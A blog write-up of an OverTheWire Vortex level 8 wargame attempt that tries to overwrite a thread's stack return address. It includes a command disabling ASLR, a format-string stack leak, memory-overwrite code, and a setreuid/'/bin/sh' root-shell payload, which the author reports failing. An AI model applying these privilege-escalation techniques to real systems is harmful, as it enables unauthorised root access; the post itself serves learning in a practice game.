Overthewire Vortex Level8, part II

Back to Level8. You can find the analysis of the problem in part I of this writeup. The idea was to overwrite the return address on the thread stack.

I’ve done this experiment on my home machine, so first I turned ASLR off:

echo 0 > /proc/sys/kernel/randomize_va_space 

Lets print out some information about the thread stack. I’ve used printf without arguments to do the job:

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#define NUM_THREADS     3

int getebp() {
    __asm__("pop %eax\npush %eax");
}

void *print_hello(void *threadid) {
   int stack=0x41414141;
   int stac2=0x42424242;
   long tid = (long)threadid;
   printf("thread #%ld! ebp:%p,stack:%p\n"
    "%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|"
    "%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|\n", 
    tid, getebp(), &stack);
   pthread_exit(NULL);
}

int main (int argc, char *argv[]) {
    long t;
    pthread_t threads[NUM_THREADS];

    for(t=0; t<NUM_THREADS; t++)
        pthread_create(&threads[t], NULL, print_hello, (void *)t);
    
    pthread_exit(NULL);
}

The results:

thread #0! ebp:0xf7e3b398,stack:0xf7e3b38c
f7e45e00|00000000|42424242|41414141|f7e3b498|f7ff3ce0|f7e3b498|f7f9d96e|
00000000|f7e3bb70|f7e3bb70|f7e3bb70|f7e3b454|00000000|00000000|00000000|
00000000|00000000|f7e3bb70|00000000|00000000|00000000|00000000|00000000|
thread #1! ebp:0xf763a398,stack:0xf763a38c
00000000|00000001|42424242|41414141|00000000|00000000|f763a498|f7f9d96e|
00000001|f763ab70|f763ab70|f763ab70|f763a454|00000000|00000000|00000000|
00000000|00000000|f763ab70|00000000|00000000|00000000|00000000|00000000|
thread #2! ebp:0xf6e39398,stack:0xf6e3938c
00000000|00000002|42424242|41414141|00000000|00000000|f6e39498|f7f9d96e|
00000002|f6e39b70|f6e39b70|f6e39b70|f6e39454|00000000|00000000|00000000|
00000000|00000000|f6e39b70|00000000|00000000|00000000|00000000|00000000|

I’ve created a small C program, to do the overwrite. We are trying to overwrite some return address on the stack, to the address of our win function. (I’ve created a sleep macro, so we can log the sleep function calls.)

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#define NUM_THREADS     2
#define sleep(x) {printf("s:%d\n",x); sleep(x); };
void win() {
    printf("WIN\n");
    exit(0);
}

void *print_hello(void *threadid) {
    for(;;) {
	printf("FOR\n");
	sleep(3);
    }
}

int main (int argc, char *argv[]) {
    long t;
    pthread_t threads[NUM_THREADS];

    for(t=0; t<NUM_THREADS; t++)
	pthread_create(&threads[t], NULL, print_hello, (void *)t);

    sleep(1);
    printf("OVERWRITE\n");    
    int addr = 0xf7e3b398;
    for(t=0;t<16;t++)
	*((unsigned int*)addr+t-16)=&win;
    sleep(5);
    printf("FAIL\n");
}

The results:

FOR
s:3
FOR
s:3
s:1
OVERWRITE
s:5
WIN

OK! It seems working. Now try to add the “payload”.

I’ve added the following two lines to the win function:

  setreuid(0,0);
  execlp("/bin/sh", "bin/sh", NULL);

But a strange thing happened:

FOR
s:3
FOR
s:3
s:1
OVERWRITE
s:5
FOR
s:3
WIN
FAIL
FOR

In the same moment, the win function is called, the main thread exits. I’ve tried to debug it, the setuid call is responsible for this behavior, but I have not found an explanation for this …

Conclusion: this idea doesn’t works :-(.

If you are interested in a different kind of solution, you can check badcob’s page. Maybe you don’t understand korean, but you can use google translate (like me) and you will understand the shellcode also. He uses mprotect & overwriting the pthreads orignal code with the shellcode.

Advertisements
This entry was posted in Wargame and tagged , , . Bookmark the permalink.

2 Responses to Overthewire Vortex Level8, part II

  1. badcob says:

    i`m not badcop. 😛

  2. axtaxt says:

    Sorry! Fixed! 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s